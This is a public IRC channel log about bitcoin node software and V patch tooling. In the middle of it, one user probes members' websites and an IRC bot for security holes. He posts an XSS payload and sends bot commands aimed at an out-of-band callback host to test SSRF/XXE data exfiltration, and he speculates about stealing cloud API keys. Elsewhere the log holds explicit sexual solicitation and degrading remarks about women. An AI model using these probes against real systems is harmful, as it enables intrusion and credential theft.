deedbot: NoSatoshisHear voiced for 30 minutes.
ben_vulpes: it was right on time if you look at when he got voice
mod6: <+mircea_popescu>
http://btcbase.org/log/2018-01-25#1776346 << i suspect his idea is "ideally, nothing". in any case foundation has not managed to keep up with the rest of the pie despite periodic prodding. << hmm. well whatever it is we do, I spend a lot of time doing it. happy to shut it down if it's not needed any more.
☝︎ a111: Logged on 2018-01-25 19:15 trinque: what is the foundation's role then?
mircea_popescu: the issue is not "what is basic", but "you are too harsh" / "am not"
mircea_popescu: mod6 dun take it personal ; for one thing i'm hussling him not you.
mod6: nothing personal. i feel like the foundation is a good thing ; maintaining all of the things re: trb.
mod6: but if there is the sentiment that it's not needed, then we should have that talk.
mircea_popescu: jesus what a juggernaut this guy is. YO! that's not the sentiment.
mircea_popescu: throw darts at ben_vulpes end up tackled by mod6 ; what is this, like teamwork ?
mod6: I think it's good that we're able to adjust to anything if need be. Tis' all.
mod6: It's only as useful, as long as it's useful kinda thing.
mircea_popescu: i'm needling him about systems design matters because he's interested, and intelligent enough, and occasionally sparks from it.
mod6: <+asciilifeform> n00b wants to run trb. which trb will he run ? << n00b runs what is available at thebitcoin.foundation -- there are some recent vpatches that will become mainline once I can get all of the things vetted more closely.
mod6: Some of this is my fault, I've been trying to keep up here. Getting kinda swampped with a bunch of things at once. But! These are all good things. FFA, eucrypt, ada, vtron stuff, et. al.
mod6: Yeah, i agree, that 'releases' is kinda anti-V.
mod6: However, until n00bs get into the fold with what 'V' is, they kinda need just 1 stable thing to build with a 1-button-push. Which means folding things in slowly.
mod6: asciilifeform: by that i mean, 'you should choose your own adventure' -- each man pulls in the vpatches he desires.
mod6: you pull in the things you want, from the people you trust.
mod6: I'm so excited right now tbh.
mod6: I'd like to see the Republic continue to expand the number of trb nodes we have available this year. There are activities currently afoot that immensly support that. Getting FFA vetted and used as a base lib really will help get the ball rolling for any proposed trbi.
mod6: This year. Very excited & positive about that.
mircea_popescu: asciilifeform sorta like "Each user must read darwin theory for himself"
mircea_popescu: yes, they must, but not with a view to validate theory of evolution ; with a view to expunge head cockroaches
mod6: <+asciilifeform> mod6: i dun particularly disagree with any of this, but the pov that 'vetting ffa' is a 1time thing, that can be done and then 'is done', imho is mistake : each user must read it ~himself~. << I basically just mean for me & ben.
mod6: We have to understand every line.
mod6: The good news is, I started really digging into ada and your sneak-previews early last year.
mod6: Thankfully I put the time in.
mod6: I'm gonna get this vtron stuff out of the way, then dive in. I should be able to make it through the first 3 chapters pretty easily. I even wrote my own unit tests for those parts.
mod6: yes. I'm starting to love ada, at least, syntactically. The way you've used it, is very straight forward -- at least once one understands how array access / slices work.
mod6: I think so too, I took a peek at it. I'm actually excited that you put homework problems in there. And I'll do 'em for sure.
mod6: Honestly, I loved the homework for ffa_calc. That was awesome.
mircea_popescu:
http://btcbase.org/log/2018-01-25#1776463 << hey, i knew a guy who didn't finance (1980s!) porn ventures because "not interested in the loose women". bought "blue chip" fucking revlon and bs instead. i'm sure there's even today ossified mind going "i'm not into tmsr because i'm not interested in terrorism". hurr durr, you never know what things are really about.
☝︎ a111: Logged on 2018-01-25 21:28 NoSatoshisHear: I worked on digital coin in 2001, but tried to find a non-net solution, and finally just gave up. When you head the wrong way, you don't get there. Still feel stupid for not buying in at $5, but I had no interest in Silk Road.
mircea_popescu: asciilifeform it's not a novel concept to me -- coins that are only verified on exchange.
mircea_popescu: see, you can tell the guy is genuinely 60ish not just because of his specific pre-internet use of language ; but also because of his default mental models.
mircea_popescu: martian bank, if you're born in say 1960s, is exactly "secret magical pocket knife"
mod6: I'd like to make another positive mention here about TMSR~, if I may : one thing that really makes me smile is that all of us, no matter how busy, or whatever, are always willing to drop whatever it is to pitch in when the ship needs trimming.
☟︎ mircea_popescu: i think i pointed out somewhere how boys that've never seen a cunt still get wet dreams, but with boobs instead. same thing here -- before networks were well understood people still thought about network-like problems. just... in roman numerals.
mod6: It's pretty fantastic all around. Very good things.
a111: Logged on 2015-08-02 21:00 mircea_popescu: you buy 6x6 inch panbes of glass and crash them
mircea_popescu: which is like "i'm satisfied X", together with "hey, wait a minute, what if..."
a111: Logged on 2018-01-26 00:31 mircea_popescu: but you can see the appeal.
a111: Logged on 2018-01-25 19:15 trinque: what is the foundation's role then?
mod6: never hurts to ask a tough question.
trinque often does this to a person he thinks is qualified to give the argument
mod6: I appreciate all your hard work / blood / sweat / tears on your trb adventure with deedbot. Your contributions are and will make a difference. This is why the republic is on top. We don't imagine the change we want to see in the world, WE MAKE THE CHANGE WE WANT TO SEE IN THE WORLD.
mod6: This goes for all Lords and Ladies too. If that wasn't obv.
mircea_popescu: i'm satisfied it doesn't work and not happy with this.
mircea_popescu: as the man said, "motherfucker, why didn't i think of that!"
mircea_popescu: if you had that alien it'd be perhaps wiser to just let him figure out what to do himself ?
a111: Logged on 2018-01-26 00:33 mod6: I'd like to make another positive mention here about TMSR~, if I may : one thing that really makes me smile is that all of us, no matter how busy, or whatever, are always willing to drop whatever it is to pitch in when the ship needs trimming.
mod6: i gotta see this movie now
mod6: ok lemme see if i can do a bit of debugging on this mpwp and see if that really was the issue there.
mod6: ok here's what I've learned.
mod6: So if you manually extract the 'mpwp/blog/wp-includes/js/tinymce/plugins/wpgallery/img/gallery.png.svg' from the mp-wp_genesis.vpatch, and place it in a file, and attempt to base64 decode it, it fails to decode.
mod6: Why? Because of the 'false' at the end of this line: ++6/l4BiDfMrebzvzrfh2UMH8cTMAsbHbPRFuih0reDbX30AD+17CB1JhgefoRhOIbIr3k3CDKGT false
mod6: (note that in the genesis, there is an additional '+' at the front of the line)
mod6: anyway, removing: ' false' from that line will indeed, yield the correct hash, and allow for a proper base64 decoding.
mod6: 9e46f66499629dc2127e8ed8f0aebef467af1d18ceeb36326791ab201cd0bc0905236b3450c6c3944f6abea9c987fb0e28cc4cdadcec5c1834546173d816a893 gallery.png.svg.mod6_edit
mod6: Perhaps something with the vdiff is doing this? Or maybe there was something weird in the original encoding of this image? But that seems to be the solution, remove that ' false' and that should work.
mircea_popescu: basically her svging of binaries did some inadvertent fuzzing of the whole vdiff process
mod6: both vdiffs fail on this.
mod6: and it goes back to the same thing as with diana_coman. having two '++' at the front of the line. the way the vdiff is written, when it passes the diffed file off to awk to pattern match the ---|+++ it adds that '+' in the front, then it matches, causing it to call sha512sum.. which is where the false comes from. I think.
☟︎ douchebag: I managed to find two vulnerabilities in Yahoo last night, I highly suggest their bug bounty program for anyone who is interested in doing that sort of stuff.
douchebag: Well, I still have to wait until they patch them before they reward the bounty. They pay based on likelyhood/impact, now a friend of mine reported a vulnerability less serious than the one I found and he was rewarded $2,000 total
douchebag: The other one I discovered, I would say probably somewhere between $200-$500
douchebag: However, even though I have to wait until they patch the bugs I found before they reward me, they did reward me $150 on triage and will be rewarding the rest at a later date
mod6: i suppose we should be looking for: (--- |\+\+\+ ) instead of (---|\+\+\+)
douchebag: A relatively well known bug bounty hunter I know has made $40k this month off of bug bounties, his goal is $50k for January
mircea_popescu: this is like re-reading old shoemoney drivel about google adsense successes. goals and whatnot.
douchebag: Haha, you do have to admit for the average person $40k in a little over 3 weeks is pretty damn good.
mircea_popescu: but you're not discussing an average person, you're discussing a selected person.
mircea_popescu: i know a girl that made $30 million with her ass ; and you must admit that for the average girl's ass this is indeed generous.
douchebag: Oh yes, that's very true. However, I do know quite a few people who have been very successful with it
mircea_popescu: i know quite a few people whose iq is over 150. the internet is good at collecting similar things. sadly -- this does little for the intelligence of the race in general.
douchebag: I suppose the point I'm trying to get across is that there is a pretty good community involved with bug bounties, I especially like the classic hacker additude of most of the people in the sense that they're all working together to learn more
douchebag: And how most people are more than willing to share the information they acquire through blogs and whatnot
douchebag: mircea_popescu: Who runs bpvulpes.com?
trinque: surely you can sleuth that one out.
douchebag: ben_vulpes: I found a vulnerability in your site, how would you like me to disclose it to you?
douchebag: It's not a major issue and an easy fix, however it could potentially allow someone to create fake logs
trinque: guy's probably away for the night. why don't you drop him a gpggram on his paste site, link him to it here
douchebag: Are there any sites any of you guys would like me to check out? I'm a bit bored right now and I am always up for a challenge :-)
☟︎ trinque: might help you more to do that reading I was talking about, and get a v-tron set up.
douchebag: Mhmmm I already got it, thanks anyway though
douchebag: mircea_popescu: any sites you want me to take a look at really quick?
douchebag: To make my job a little bit easier, could you tell me a little bit about mp-wp and how it differs from Wordpress?
a111: Logged on 2018-01-23 07:11 mircea_popescu: actually, hanbot is about to genesis mp-wp, you're more than welcome to help down with the paring down effort of that, if you want. mostly php.
mircea_popescu: hanbot just published an unofficial genesis, so you can just fire up your v and press that
douchebag: Where can I find a copy of the source?
douchebag: mircea_popescu: I have discovered a vulnerability :-)
douchebag: How would you like me to disclose this?
douchebag: Is it alright if I link you to a PoC of the vulnerability?
douchebag: I was able to execute arbitrary Javascript on your site
douchebag: XSS can be used to steal cookies of logged in users which can then be used to jack their session.
douchebag: So there is never a session stored on the site?
mircea_popescu: not afaik ; moreover, does an alert box actually pop up for you ?
mircea_popescu: odd, neither archive bot not this testbox firefox i have do it.
douchebag: You'll see arbitrary html was added to the page
mircea_popescu: this is hysterical, apparently it works in newer (3x, 4x firefox) but not in older (2x say).
douchebag: It might be, I'm not sure at the moment if this was added with mp-wp or if it was uploaded to trilema.com's webhost a later date
douchebag: Oh yeah, javscript is great isn't it?
mircea_popescu: anyway, i suppose "the message chosen was $" is just bad webcoding on my part.
douchebag: Don't feel bad, XSS is one of the most common vulnerabilities that exists on the majority of websites
mircea_popescu: but this browsershots set is a comedy goldmine! apparently a good third of the failful firefox browsers ALSO are getting an "uptades" blabla popup
douchebag: I wonder if any of the logs will pop an alert
douchebag: mircea_popescu: So the bots in this channel for instance the one that will add your GPG key from a url you provide
douchebag: That actually can hold quite the potential of a vulnerability
douchebag: If it's returning page responses in any way, it could be used to access internal network addresses
douchebag: What are the commands that have that sort of functionality?
deedbot: 6160E1CAC8A3C52966FD76998A736F0E2FB7B452 is already registered as mircea_popescu.
douchebag: Well, since RSS is in XML format I was testing a popular vulnerability that occurs in XML parsers which uses external entities, allowing an attacker to exfiltrate data
☟︎ douchebag: !!deed darrq98n7ienm1nx3uw36dvyqpwik7.burpcollaborator.net
deedbot: Bad URL or network outage.
deedbot: Bad URL or network outage.
douchebag: !!deed gopher://darrq98n7ienm1nx3uw36dvyqpwik7.burpcollaborator.net:80/_TEST
deedbot: Bad URL or network outage.
douchebag: That would have been cool if it worked
douchebag: Honestly, I bet a lot of boxes could be popped just from messing around with IRC bots lol
douchebag: IF I were able to find a bot that essentially returned the content of that URL and it was hosted on Amazon AWS
douchebag: I could grab the AWS Instances API keys lol
douchebag: It's the simple things like that which can do that most damage
deedbot: emmylark voiced for 30 minutes.
emmylark: *and madames. don't wanna discriminate
mircea_popescu: emmylark so write 4b57ff75 on your tits ; and get your slit in the shot as well.
mircea_popescu: tell me... how does it feel... to be all nude... like a hm... like a rolling stone.
emmylark: How did I do sir? Was it acceptable? I sent a second one just in case the first wasnt enough. I thought it might be nice to get to choose
mircea_popescu: now put your public key in a paste and say !!register url
mircea_popescu: emmylark it's very nice to get to choose ; i choose to keep the second for my private collection of smutty selfies.
deedbot: Provide a paste URL to the ascii-armored GPG public key or the full 40 character key fingerprint without spaces or dashes.
deedbot: 3BC472963B76AEE0448C19F414DEC3397D761EA4 registered as emmylark.
mircea_popescu: emmylark did you ever register your name with freenode ?
mircea_popescu: say /msg nickserv register your_password your_email_address ; use a good password and an email you actually can read, they'll send you a verification thing. this way someone else can't steal your name.
emmylark: I'm talking to you through the Freenode server in my IRC client. It made me register a name and email.
mircea_popescu: !!rate emmylark 1 Slutty pixie bearing my protection collar.
mircea_popescu: emmylark congrats on earning your first coupla bitcents!
emmylark: Wait are you serious? I did that for you sir.
deedbot: emmylark voiced for 30 minutes.
mircea_popescu: i rated you, so now the bot will allow you to voice yourself. say /query deedbot and then !!up ; it will give you a thing to decrypt, give the result back to it as !!v <string>
douchebag: I just learned about AngularJS XSS attacks
jhvh1: shinohai: Bitstamp BTCUSD last: 10531.07, vol: 14129.46495924 | Bitfinex BTCUSD last: 10527.0, vol: 49688.74405499 | Kraken BTCUSD last: 10538.0, vol: 6394.72947932 | Volume-weighted last average: 10528.8208745
mircea_popescu: but i thought they already had a perfect medium of exchange called the unified standard dosidoe!
a111: Logged on 2018-01-26 08:59 douchebag: Well, since RSS is in XML format I was testing a popular vulnerability that occurs in XML parsers which uses external entities, allowing an attacker to exfiltrate data
a111: Logged on 2016-05-01 14:53 mircea_popescu: asciilifeform> mod6: the baked-in presumption of webtardism is almost insulting << it is insulting, not to us though. think about it : the crab has pincers because in its environment THAT WORKS ; and so does "GET /blog/blog-config.php~".
lobbes:
http://btcbase.org/log/2018-01-26#1776736 << you really should do the homework trinque pointed you to, but if you are done with that and bored again, plox to look at logs.minigame.bz, lobbesblog.com and lobbesbot? I'm a meganoob so you may find something. I've no shame, so disclose whatever you can find here. I'll toss a handful of satoshis your way if you do (and a wot rating)
☝︎ a111: Logged on 2018-01-26 07:09 douchebag: Are there any sites any of you guys would like me to check out? I'm a bit bored right now and I am always up for a challenge :-)
lobbes: Most of the 'dynamic' bits of the www are php+sqlite3. lobbesbot is limnoria (fork of supybot, a common python bot api), also atop sqlite3
trinque appreciates the deedbot fuzzing. pretty damned sure all my inputs are quoted though.
mircea_popescu: in fairness, kid's got me meditating about the nature of things ever since last night. see, the trouble is : in his syustem, he has actually found a vulnerability, as a factual matter. in my system this is entirely meaningless. why the difference ?
☟︎ deedbot: mircea_popescu rated douchebag 1 at 2018/01/15 07:34:46 << hyde.solutions
a111: Logged on 2015-08-13 19:00 phf: mats: well, i actually meant the opposite. classes of attacks can be eliminated by not using c. i think that majority of the attacks come from leaky abstractions. there's no <string> in c, but there's a null terminated memory region. there's no <sql> in perl, but there's a character array with sql text in it. one of the solutions is to plug abstraction holes on a level of the language, in such a way that you can't not use improved abstractions
mircea_popescu: asciilifeform there's two fundamental items i can readily identify, maybe more. 1. i actually did plop an echo $_GET in there. is this just bad coding ? is it a legitimate assumption ? 2. he has a point, as long as it's on trilema.com, a script has powers OUTSIDE of its implicit scope, "steal cookies" whatever. is this ~actually~ bad systems design ?
mircea_popescu: obviously quoted link's right ; other than the attacks croming from nsa ("enemy" aka idiot with vested interest in idiocy), they ALL come from leaky abstractions. both points above qualify.
a111: Logged on 2016-08-01 19:48 asciilifeform: oh for fuckssake.
a111: Logged on 2018-01-16 17:08 mircea_popescu: (also, let it be pointed out for the benefit of the future noob : the use of xargs with shit from curl is dancing with the wolves. finest way to lose a box.)
mircea_popescu: well which the fuck is it, and don't tell me "why mp! perl=bash=php=crap", it's not the point.
mircea_popescu: if i'm responsible for the above why am i not responsible for sending emmylark nude on a harley to luser's house to tear out intel ME out of his chip ?
mircea_popescu: but the "you enabled js, you're dead" position is untenable -- i use js for the selection thing. and i fucking need it
mircea_popescu: without the ability to link INSIDE my output $value would decrease sensibly. not a little. a lot.
mircea_popescu: i honestly believe it's as big as the concept of link.
mircea_popescu: this triad : links, pingbacks, selection reference make up a whole NEW hypertext. just as far from the old as that was from text.
mircea_popescu: asciilifeform half of one, yes. needs the pingback to be full.
mircea_popescu: note the epic lulz of how the "vulnerability" doesn't even work until you gert to ff version 30.
mircea_popescu: there's a pile of browser captures linked in there yest.
mircea_popescu: (because they didn't parse svg tags prior, not because "it doesn't work", he could have made it to work with plain script, so it's a separate issue, but quite germane)
mircea_popescu: imo a fabulous textbook example of how the imperial vulnerability cycle goes. 1. make a bad spec, a la SMGL ; 2. implement some portions of it only, because
http://btcbase.org/log/2018-01-25#1776189 ; 3. discover the bad spec is vulnerable, issue "best practices" for people to "santize". obviously this will not be made by 1 if 2 wasn't, so... 4) implement slightly more of the spec, throw security in disarray.
☝︎ a111: Logged on 2018-01-25 16:42 asciilifeform: i dun actually disagree with mircea_popescu : i never liked bigendianism . but it did come from a particular cost analysis , ftr.
mircea_popescu: this is EXACTLY how it goes, and perhaps why there has not yet existed such a thing as a fully implemented specification or a fully specified implementation in empire lands.
mircea_popescu: hey, i was looking for a pretext to get a test, so bbs.
a111: Logged on 2016-08-01 20:03 phf: mircea_popescu: a lot of xss detection "solutions" rely on grepping for known bad input, like "script" or whatever. and there are ways to sidestep that, like '<scr' + 'ipt>' or a='ipt>';'<scr'+a. in this case whoever is fucking with detection by using this truly wtf feature i've never heard of, <meta charset="a">b</meta> that apparently parses b according to charset a rules
mircea_popescu: asciilifeform slavegirl tasted, says my sperm count's fine (and delicious). so NYAH!
a111: Logged on 2018-01-25 16:29 mircea_popescu: wait wait, i might have a pill
mircea_popescu: asciilifeform i didn't expect it'd work mechanically ; but there it is now.
mircea_popescu: i suppose the workings of this insane nut posse must be quite disconcerting to the professional. "i told this guy he had an xss hole in some file and he proceeded to sign an unrelated snippet of javascript".
mircea_popescu: but, take heart douchebag : there's not that many people your age that can say "hey, i sent mp to meditation room" ; and they're overwhelmingly female to boot.
mircea_popescu: asciilifeform admire the recursive gift : his "reputation in the community" doth indeed grow. what now.
mircea_popescu: well... didn't the problem appear misstated originally ?
a111: Logged on 2018-01-23 19:52 phf: i can see the education angle, and how it fails these people, but what i'm surprised about is the lack of personal drive? it's some kind of learned helplessness
mircea_popescu: in entirely unrelated lulz : i recommend to the expert entomologist item #341 of the assembly of the state of new york, entered into record april 12, 1838 (a message from W L Marcy, the governor).
mircea_popescu: asciilifeform i got a hardbound copy. shall i have it transcribed ?
ben_vulpes: douchebag: how does this allow a user to create fake logs?
a111: Logged on 2018-01-26 05:06 mod6: and it goes back to the same thing as with diana_coman. having two '++' at the front of the line. the way the vdiff is written, when it passes the diffed file off to awk to pattern match the ---|+++ it adds that '+' in the front, then it matches, causing it to call sha512sum.. which is where the false comes from. I think.
a111: Logged on 2016-12-11 20:15 mircea_popescu: +++7F0QaZAgBgF3/7448/fmnc/DnT29zJipI3ZCWnifqyfJH6/nRzUt7979al5JtwrACPLNjDb5Pc false <<< ahahaha epic!
jhvh1: asciilifeform: The operation succeeded.
mircea_popescu: i suspect this is what we are gazing upon in amazement : that slavegirl must ~love~, ie that there is no mechanical solution to the problem.
mircea_popescu: in vaguely related lulz : there existed a cult which had the girls prostitute themselves for membership. (apparently it was tried with boys too, but it didn't pay.) eventually they just listed them as proper whores with "escort agencies". apparently a total of >quarter million men were made to feel religious however briefly during a decade.
mircea_popescu: because usually cults are build around a paranoid not a narcisiac
mircea_popescu: wants to fuck them himself, and what he can't fuck he kills.
mod6: the warren jefferies thing?
mircea_popescu: i dunno that any of those has anything to do with my harem tbh.
mircea_popescu: well, no, i mean something like "just because it has cogs in it doesn't mean it's a clock, could be a car transmission"
ben_vulpes: douchebag: how does what you found get leveraged into 'fake irc logs'?
mircea_popescu: and yes ; but that doesn't make the luddite right in any meaningful sense
douchebag: Able to inject Javascript, such javascript could be used to create a link that leads to logs that appear real, however they're completely fake
douchebag: Basically, the javascript could be used to remove the logs that exist (on the client side mind you), and add in logs that are fake
ben_vulpes: douchebag: so someone sends someone else a link with ?q=<script="diddledepageforme">, and unsuspecting b copies, pastes, reads everything but the url bar?
douchebag: It could be URL encoded, so they wouldn't really be able to read anything
douchebag: So yeah, people who know what the typical url format is would likely know right away that something is up
ben_vulpes is reminded of the doctorow pulp, "human readable"
a111: Logged on 2018-01-26 16:34 asciilifeform: but conceivably one day there will be an idjit browser that gives obama root on yer box when it sees string 'open sesame'. and what, errybody gotta know in advance to escape 'open sesame', lol ?
douchebag: url -> url w/ js added in vuln parameter
douchebag: i gotta run, be back in about 30 mins
a111: Logged on 2018-01-26 17:45 douchebag: 1BTC reward? I'm up for that challenge any day
a111: Logged on 2018-01-26 08:44 douchebag: <script>alert`OHAI`</script>
BingoBoingo: <asciilifeform>
http://btcbase.org/log/2018-01-26#1777052 << i'd like to make such a challenge. but turns out that we do not even yet have a usable formula for what exactly even is an exploit. << Dude finds way through pehbot commands to replace host machine BIOS with "Hypercard" binary that shipped with OS7
☝︎ a111: Logged on 2018-01-26 17:45 douchebag: 1BTC reward? I'm up for that challenge any day
BingoBoingo: asciilifeform: Burns down box leaves less to confirm by reading failROM
BingoBoingo: asciilifeform: You failed to spec that part. You spec'd pehbot
mircea_popescu: it's very solvable as stated, but not mechanically. "1. figure out v ; 2. press pehbot ; 3. say intelligent things about it." "intelligent according to whom ?" "intelligent according to me" "how am i supposed to cheat this ?!" "you aren't."
a111: Logged on 2018-01-26 18:02 asciilifeform: mircea_popescu for instance prolly knew that one could paste a js into his php thing. but had no particular reason to give a damn
mircea_popescu: it's ~certainly~ in the list of things they'd spew once put to the question.
a111: Logged on 2018-01-26 16:34 asciilifeform: but conceivably one day there will be an idjit browser that gives obama root on yer box when it sees string 'open sesame'. and what, errybody gotta know in advance to escape 'open sesame', lol ?
BingoBoingo: In other exploits, tonight I will be sleeping in a different bed because axe time gas time has some for the chinches de cama!
BingoBoingo: Eh, not such a big deal. First weeks the bites itch and then your immune system stops caring and you cease to get quite the histamine reaction to the bites.
mircea_popescu: how's the cocksuckers BingoBoingo ? apparently moar bloodsuckers.
BingoBoingo: mircea_popescu: Starting to get more attention for them again as my confidence recovers from the past weekend
mircea_popescu has had the following unpleasant experience : was going to take whore tribe horseback riding ; called whorelist, "o sure, pick me up ?" ; called horse farms "nope, wounded/gone/booked/etc". HOW!!! could it be harder to get horses than whores!
BingoBoingo: Mebbe horses provide less useful error messages to the locals? Thusly there were many available horses until they hit the same fate the cars do.
mircea_popescu: the true horse killing was in 50s, when ceausescu decided to force agromecanization
a111: Logged on 2018-01-26 16:15 mircea_popescu: in fairness, kid's got me meditating about the nature of things ever since last night. see, the trouble is : in his syustem, he has actually found a vulnerability, as a factual matter. in my system this is entirely meaningless. why the difference ?
a111: Logged on 2018-01-26 17:12 mircea_popescu: not if it works to deliver the results above ?
mircea_popescu: phf is this repackageable into a puritan argument against sluts ? if not, why not ?
phf: i don't know the puritan arguments against sluts
mircea_popescu: you may not be aware, but the ~original~ repression of faggotry has everything in common with the original repression of jews, masons, etc : it was perceived by the "normal" man that these "perverts" have it TOO EASY.
mircea_popescu: it's "unfair" (in the exact sense of childhood playground) and therefore "forbidden". because... obviously you can find a MALE partner to work with ; the question is to get one of the speaking cows to do it.
mircea_popescu: so men who fuck men have an "unwarranted" social advantage, and consequently off with their heads.
phf: wake me when there's a "too easy" on btcbase
mircea_popescu: and so : a homebreaker is a female that delivers on the "easy" part which "anyone could do" (sex) and not on the hard part -- and there's no quotes there because how about YOU try polishing an oaken table the size of a current usian garage each morning, plus rub the iron pots.
mircea_popescu: !~google he's here, he's here, he's here have no fear, stay by his side an' he'll take you for a ride...
phf: mircea_popescu: i'm perhaps failing to find a point at which your analogy connects with the situation. i read it as "don't know on things that seem trivial"
mircea_popescu: phf no, no, the structure of the argument, "X propagates via r-selection" is not delivering on what i expect is the intent ("of COURSE x is "bad" in the sense of illegitimate).
mircea_popescu: the problem is that illegitimacy crosses a definition boundry (it doesn't mean the same thing in boston wharf side and in african village) and so leaves us stranded.
phf: yes, totally unrelated, yeesh slow day.
douchebag: Alright, what do you guys suppose I do I've been trying to find vulns in Starbucks pretty much all night with very little success. Should I continue hitting this bug bounty, or switch over to Yahoo's program?
phf: but, the intent wasn't actually "of course x is bad", we've had conversation about that elsewhere, this was a pure cause/purpose "you're fat" situation: that's literally how security theater propagates!
a111: Logged on 2018-01-25 23:37 NoSatoshisHear: centralized system, so one server counts the ticks, it would simply be a demo of reddit "the button" style idiocy combined with gambling. Sounds viral, like the 1918 flu.
mircea_popescu: phf ah, so it was just stating the obvious for some reason ? i'm... aware that's how it propagatges o.O
phf: well, i didn't know if you were aware, and i can always fall back to the usual log "but tis was for the reader!"
mircea_popescu: (the truth of the matter is that the power of human speech comes from parsing and collapsing very lengthy and complex trees ; one of the rules is "obvious branch is dead", which means you practically never assume one's stating the obvious, so you pick the alternative)
mircea_popescu: phf the actual trick i use to force a "no, go down obv branch" is by prepending a "you know" or whatever. but, sure.
phf: i've seen the machinery work many times, though for some reason it reminded me of the case where it misfired, in a famous bit by feynman where he was cracking safes at los alamos, security resolution and the unexpected punchline is "don't let feynman near your safes"
BingoBoingo: douchebag: Have you tried flipping a coin? Or failing that tire flipping a bit?
douchebag: Not really too much, I've held onto coin and made a bit here and there. Typically I end up selling it right away so that I can get my cash in hand and not have to worry about waiting for the price to fluctuate. I know I should have held onto it
trinque gives this "pls to mirror back to me that am doing smart things smartly" hours to live
douchebag: Considering I looked at one of my wallets and $50 transactions are now worth roughly $20,0000
BingoBoingo: douchebag: I mean in the physical sense. You know... the old fashioned kind of flip and coin. Or flip and tire.
douchebag: Not really, I know that by responsibly disclosing vulnerabilites to companies I am building a pretty awesome resume which will benefit me later in life
douchebag: Everyone else I know is working some shitty job, not getting a decent amount of experience, and they're just kind of stuck in the same place. Meanwhile, I'm just entertaining myself with the challenge of hacking these companies
trinque: douchebag: your "write-only" mode grows tiresome
shinohai snickers a bit @ 'responsible disclosure'
trinque: nobody is inviting you to "be in the republic in your own way"
douchebag: Eh, perhaps. It's mainly just a hobby of mine, and I'm constantly learning from it and it pays the bills for now.
douchebag: Well, I'm not the best programmer out there however I always make damn sure the code I do write is secure as it can be
douchebag: "V. You could learn how to program correctly, such as for instance by writing your own Vvi implementation, or by standing up an irc botvii, or by following the excellent manuals produced by the Lordshipviii. Bear in mind that it is deemed unethical within the Republic to write code if you haven't actually learned how to write it first, and that orcs' claims to have taught you something often turn out
trinque: douchebag: skipped right over the reading *again* did you
douchebag: Well, I'm just trying to figure out where my skillset could be best put to use, I would be more than capable of writing a V implementation or setting up an IRC bot. I'm trying to leave it to you guys to tell me where my skillset could best be put to use
☟︎ lobbes: douchebag: while you are intelligent, and may have succeeded in sending mp to meditation room, realize that continued existence in this forum is predicated on you doing something useful for the Republic. Understanding -what- is useful will require (as trinque has been patiently explaining) "moar ready, less talky".
shinohai: !!rate douchebag -1 *autistic screeching
a111: Logged on 2018-01-23 20:04 ben_vulpes: ours mostly
trinque: several folks told douchebag here to do various somethings
lobbes: douchebag, -as you read more- the "how can I best use my skillset" will become obvious to you
shinohai: !!v F446A115E51B6AB6665F943C47F5DBADD60D81F06A76C65156E43F4710A7B46C
deedbot: shinohai rated douchebag -1 << *autistic screeching
trinque ftr thinks it's nice to see someone that shows up and wants to do *anything* aside pull his dick
trinque: just, the dickpulling can now go.
shinohai: Could have used skills to hack CoinCheck, been 530M usd richer
shinohai: Beatings bring about character development!
douchebag: I would like to clarify with someone that I properly understand everything required to create a V implementation.
☟︎ shinohai: No, not incurable, but simply needs to do time in the logs, etc. to cure the aforementioned head cockroaches.
trinque: asciilifeform: shinohai negrated him all by himself
trinque: I don't see where I condemned
ben_vulpes: douchebag: so demonstrate it, yeah? talk is cheap.
douchebag: I'll write something up and let one of you take a look at it when I'm finished.
douchebag: It'll most likely be it's own web application.
ben_vulpes: douchebag: surely you're not thinking of something that would eat a mess of patches and sigs and vomit forth a press, are you?
shinohai: I'm genuinely curious to see gpg operations performed in a web app.
ben_vulpes: douchebag: howabout you tell me what this "it's own web application" is going to do
mod6: before writing a vtron, maybe spend sometime using one.
ben_vulpes: douchebag: mod6 has a point, consider pressing a trb and syncing it douchebag
trinque: we'll never know which is a nick reference and which isn't!
douchebag: That's probably a good idea before I start.
ben_vulpes: still curious in re what this hypothetical webapp would do
ben_vulpes: asciilifeform: let the kid speak for himself, eh?
douchebag: Well, the web application would just be for viewing purposes, the PGP operations will still be done via command line. I am quite comfortable writing web apps using Python's Flask web framework
trinque: I see guidance, not beating, no harm there
ben_vulpes: guidance and beatins can be hard to distinguish at twenty feet when kiddo's reaching for the stove
douchebag: I do not know what marching orders are at this time, I'm going to have to read more into it to better understand
shinohai: ben_vulpes link is most definitely required reading imho
ben_vulpes: douchebag: press a trb with non-"release" patches so's you understand usage, ideally sync the binary if you can afford the hardware. then, write your own v, test it, and bring it back for review.
douchebag: Forsure, is there one you suggest me starting with?
douchebag: V implementation to use so that I understand how everything is working together
ben_vulpes: asciilifeform's elaborates the fundamentals, mod6 has polished his to handle a bunch of edge cases.
ben_vulpes: it is a matter of taste. would you rather read python or perl?
mod6: fwiw, if you're comfortable with py, and you're on a learning quest, then start with alf's
shinohai: Her "Faith adviser" no less! Must have counseled 'ol Bill too.
phf: "The currency of the far-right: why neo-Nazis love bitcoin (The Guardian)"
phf: "... Only joint action by the G20 countries, as proposed by France and Germany, could be enough to become a game changer. ..."
☟︎ phf: wherein she blames far right for creating and feeding islamic extrimism
a111: Logged on 2018-01-26 19:24 asciilifeform: douchebag: does it ever bother you that you sell a $10k info for $1k ?
a111: Logged on 2018-01-26 20:04 douchebag: I would like to clarify with someone that I properly understand everything required to create a V implementation.
a111: Logged on 2018-01-25 01:01 mircea_popescu: v is esentially found today as an enchanted castle surrounded by 5000 rakes upon which the prince is welcome to step, and once he stepped he can come to us and by the shape in his forehead we can describe the rake he stepped on.
a111: Logged on 2018-01-26 22:16 phf: "... Only joint action by the G20 countries, as proposed by France and Germany, could be enough to become a game changer. ..."
a111: Logged on 2014-02-07 15:23 mircea_popescu: "Remember : we know where YOU live."
mircea_popescu: better make sure there's replacement "representatives" "presidents" etcetera for the WHOLE list.
mircea_popescu: well... if you do this many shows eventually you're gonna have to rely on reruns!
a111: Logged on 2018-01-26 20:46 shinohai:
http://archive.is/KoGnA <<< Not mentioned here, how Coincheck asked the NEM developers to roll back chain ala mETH to recover losses.
mircea_popescu: i have about $1 trillion in trimmed pubic hairs. they, unlike a "transgender", are actually female, being XX.
shinohai: There's actually a market for shaved pubic hair! lol
mircea_popescu: asciilifeform the more interesting point is that purely latino style "kidnappings" are moving into the us in complete defiance of "law enforcement".
mircea_popescu: i was talking re "contempo" period, post ww2 not of the fucking know-nothing movement.